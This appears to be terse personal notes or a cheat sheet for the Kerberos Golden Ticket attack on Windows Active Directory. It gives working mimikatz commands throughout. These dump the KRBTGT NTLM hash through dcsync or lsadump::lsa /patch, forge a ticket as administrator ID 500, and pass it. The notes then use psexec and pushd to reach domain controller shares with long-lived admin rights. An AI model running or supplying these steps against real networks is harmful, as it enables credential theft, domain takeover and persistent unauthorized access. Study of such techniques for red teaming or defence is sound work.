Golden Ticket
Check if you're in the right priv
psexec.exe \\dc_name cmd.exe
if this won't work then this won't work.
What you need:
- 1.Domain name:
- 2.SID:
whoami /user
3. KRBTGT NTLM Hash: (requires elevated priv) -> if we can obtain this, we can create our own TGT
- non-priv user is the member of the Domain Admin's group ---> DC will trust it if encrypted correctly
- The password hash doesn't change automatically, meaning there's a good chance that the old tickets are somewhere in the system!
run mimikatz
and
dcsync /domain:domainname.local /user:krbtgt
or
lsadump::lsa /patch
copy Hash NTLM value.
--
Use golden ticket to get an access to a domain group with the information you got!
on mimikatz command,
kerberos::golden /domain:domain.local /sid:SID_Value /rc4:NTLM_HASH /id:500 /user:gori
- id value- pass in the id that you want to create an account for -> 500 - admin
- /user -> name it whatever!
After you create an account, pass the ticket
keberos::ptt ticket.kirbi
if you launch a command prompt now
misc::cmd
you will have priv of admin! You can access domain controllers file shares (and it doesn't expire for a long time!!!)
pushd \\domain_Controller\c$
or
psexec.exe \\dc01 cmd.exe
to launch a command prompt with the newly created DC account.
check your group memberships
whoami /groups